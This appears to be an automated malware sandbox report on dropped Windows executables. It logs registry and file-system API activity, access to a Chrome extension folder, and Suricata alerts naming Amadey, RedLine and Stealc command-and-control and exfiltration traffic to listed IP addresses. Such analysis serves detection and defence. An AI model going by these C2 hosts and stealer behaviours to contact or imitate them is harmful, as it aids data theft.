                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F5E3CC FindClose,FindFirstFileExW,GetLastError,9_2_00007FF643F5E3CC
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F5E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,9_2_00007FF643F5E440
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F29B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,9_2_00007FF643F29B00
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F8070C FindFirstFileExW,9_2_00007FF643F8070C
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68459E3CC FindClose,FindFirstFileExW,GetLastError,11_2_00007FF68459E3CC
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF68459E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,11_2_00007FF68459E440
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684569B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF684569B00
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845C070C FindFirstFileExW,11_2_00007FF6845C070C
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D5FA54 FindFirstFileExW,12_2_00007FF711D5FA54
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D4CD08 FindClose,FindFirstFileExW,GetLastError,12_2_00007FF711D4CD08
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D4CD7C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,12_2_00007FF711D4CD7C
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD69B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,13_2_00007FF61DD69B00
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD9E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,13_2_00007FF61DD9E440
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD9E3CC FindClose,FindFirstFileExW,GetLastError,13_2_00007FF61DD9E3CC
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDC070C FindFirstFileExW,13_2_00007FF61DDC070C
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
                      Source: firefox.exeMemory has grown: Private usage: 3MB later: 185MB

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.10:49856
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49868 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.10:49848 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49884 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49904 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49926 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:49938 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:49938 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:49938 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:49933 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:49933 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:49933 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:49943 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:49943 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:49943 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49951 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49970 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.10:49987 -> 185.81.68.147:1912
                      Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.10:49987 -> 185.81.68.147:1912
                      Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.10:49987
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:49989 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:49989 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:49989 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:49996 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:49996 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:49996 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:49998 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:49998 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:49998 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49999 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50008 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50008 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50008 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50011 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50011 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50011 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.81.68.147:1912 -> 192.168.2.10:49987
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50017 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50017 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50017 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50021 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50021 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50021 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50030 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50030 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50030 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.10:50024 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.10:50024 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.10:50024
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:50035 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50036 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50036 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50036 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.10:50024 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50034 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50034 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50034 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.10:50024
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50038 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50038 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50038 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.10:50024 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50040 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50040 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50040 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50041 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50041 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50041 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50043 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50043 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50043 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50045 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50045 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50045 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.10:50047 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50048 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50048 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50048 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50060 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50060 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50060 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50061 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50061 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50061 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50064 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50064 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50064 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50050 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50050 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50050 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:50063 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50067 -> 185.81.68.147:80
